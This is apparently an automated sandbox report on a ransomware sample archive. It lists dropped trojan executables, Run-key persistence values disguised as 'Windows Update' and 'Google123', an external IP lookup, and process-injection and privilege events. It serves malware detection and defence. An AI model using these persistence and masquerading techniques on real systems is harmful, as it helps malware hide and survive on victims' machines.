Malware Analysis Report

2024-10-16 03:27

Sample ID 240910-wf31faxgqb
Target RNSM00486.7z
SHA256 4b4567580aa77913f8b2845b322a1fa43010c5210f791fbbe780ec75934a4f23
Tags: discovery persistence upx
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 4b4567580aa77913f8b2845b322a1fa43010c5210f791fbbe780ec75934a4f23

Threat Level: Known bad

The file RNSM00486.7z was found to be: Known bad.

Malicious Activity Summary

discovery persistence upx

Blocklisted process makes network request

Executes dropped EXE

UPX packed file

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Program crash

Modifies registry key

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-10 17:53

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-10 17:52

Reported

2024-09-10 17:56

Platform

win10v2004-20240802-en

Max time kernel

191s

Max time network

189s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\zbhnd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\BD366504095.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\BD366504095.exe | N/A

UPX packed file

Tags: upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Adds Run key to start application

Tags: persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RNSM00486\\00486\\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe\"" | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hacker Man = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\svchost.exe" | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Google123.exe\"" | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\7D57AD13E21.exe" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\7D57AD13E21.exe" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\BD366504095.exe" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Admin\\AppData\\Roaming\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 5056 set thread context of 4828 | N/A | C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe | C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
PID 4480 set thread context of 2492 | N/A | C:\Users\Admin\AppData\Roaming\BD366504095.exe | C:\Users\Admin\AppData\Roaming\BD366504095.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Tags: discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\zbhnd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\BD366504095.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\BD366504095.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A

Modifies Internet Explorer settings

Tags: adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4372 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4372 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
PID 3020 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
PID 3020 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
PID 3020 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
PID 3020 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
PID 3020 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
PID 3020 wrote to memory of 4384 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
PID 3020 wrote to memory of 4384 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
PID 3020 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
